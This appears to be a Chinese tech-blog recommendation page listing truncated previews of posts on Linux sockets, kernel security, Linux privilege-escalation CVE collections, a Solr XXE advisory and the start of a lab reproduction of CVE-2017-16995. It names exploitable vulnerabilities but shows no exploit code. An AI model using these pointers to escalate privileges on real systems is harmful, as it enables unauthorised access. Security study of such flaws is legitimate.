Linux系统中,TCP(Transmission Control Protocol)套接字是实现客户端与服务器间可靠通信的基础。本教程将探讨如何在Linux环境下使用C语言编写TCP socket的客户端和服务器程序。TCP是一种面向连接的、可靠的传输...
linux 内核挂起 ping,Linux内核安全详解 "ping到死"复活方法
weixin_39956612的博客
05-04 116
对于电脑用户来说,Windows的强大功能服务了广大用户, 不过Windows安全问题还是让很多人头疼,所以很多人开始应用Linux,不过Linux内核安全也不能疏忽,今天就讲讲Linux内核安全问题清理。Linux内核 内核安全Windows的安全问题比谷仓里的跳蚤还要多,但Linux也未必就对自身的安全漏洞免疫。最近有两个明显的bug被发现,不过很快就修好了。为了保证你不受困扰,你需要尽快地为...
kernel module 禁止ping
gudujianjsk的专栏
11-02 615
以下模块相当于禁止ping某一个IP地址相当于命令: iptables -A OUTPUT -p ICMP -d 220.181.111.147 -j DROP 代码: #include #include #include #include #include #include #include #include #include #include #inclu
linux提权漏洞大全,Linux平台提权漏洞集合
weixin_31943449的博客
05-15 558
CVE-2017-1000367  [Sudo](Sudo 1.8.6p7 - 1.8.20)CVE-2017-1000112  [a memory corruption due to UFO to non-UFO path switch]CVE-2017-16939  [UAF in Netlink socket subsystem – XFRM] (Linux kernel before 4....
linux kernel ping_init_sock poc,窖藏15年新鲜出炉的Linux内核漏洞 - 嘶吼 RoarTalk – 回归最本质的信息安全,互联网安全新媒体,4hou.com...
weixin_34688966的博客
05-13 171
简介新发现的“老洞”当您随意浏览Linux内核的源代码时,是否有过突然冒出“等一下,这里好像不太对劲”的想法呢?当我们在Linux内核的一个被遗忘的角落里发现了三个安全漏洞时,就出现过这种情况,并且,新发现的这些漏洞已经潜伏了15年左右了。与我们发现的大多数积满灰尘的东西不同,这些漏洞仍然具有很高的实用价值,其中一个漏洞可以用来在多个Linux环境中实现本地提权(LPE)。关于SCSI本文中涉及的...
Apache Solr安全相关
公众号shadow sock7
08-08 748
CVE-2018-1308: XXE attack through DIH’s dataConfig request parameter https://issues.apache.org/jira/browse/SOLR-11971 solr配置dataimport方法 https://blog.csdn.net/u010367582/article/details/54095343 https...
漏洞公告】CVE-2017-1000367:Sudo本地提权漏洞
bystarlight的博客
06-02 6069
原文链接 2017年5月30日,国外安全研究人员发现Linux环节下,可以通过sudo实现本地提权漏洞漏洞编号为CVE-2017-1000367,该漏洞几乎影响了所有Linux系统。  具体详情如下:                                                                                 漏洞编号:   CVE
Linux socket系统调用(三)----tcp_socksocksocket结构体以及TCP slab缓存建立
Blue summer的博客
02-23 3666
内核协议栈初始化时—-inet_init()函数,注册了内置的几种协议(TCP,UDP,RAW,PING),同时为每种协议申请slab高速缓存。 static int __init inet_init(void) { ... rc = proto_register(&amp;amp;tcp_prot, 1); if (rc) goto out_free_reserv...
CVE-2017-16995 漏洞利用
weixin_30522095的博客
03-25 2605
Ubuntu本地提权(CVE-2017-16995)漏洞复现 在 ichunqiu 看到的环境(https://www.ichunqiu.com/course/61487),觉得有意思就记录一下。 实验环境 操作机:Kali Linux IP:172.16.11.2 目标IP:172.16.12.2 目标账号密码:ichunqiu ...
linux内核 sock_diag_events sock_diag_broadcast_destroy_work
最新发布
06-03
`sock_diag_events` 和 `sock_diag_broadcast_destroy_work` 都是Linux内核中与网络诊断机制(netdiag)相关的数据结构和函数。 `sock_diag_events` 是一个数据结构,用于在用户空间和内核空间之间传递网络套接字...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值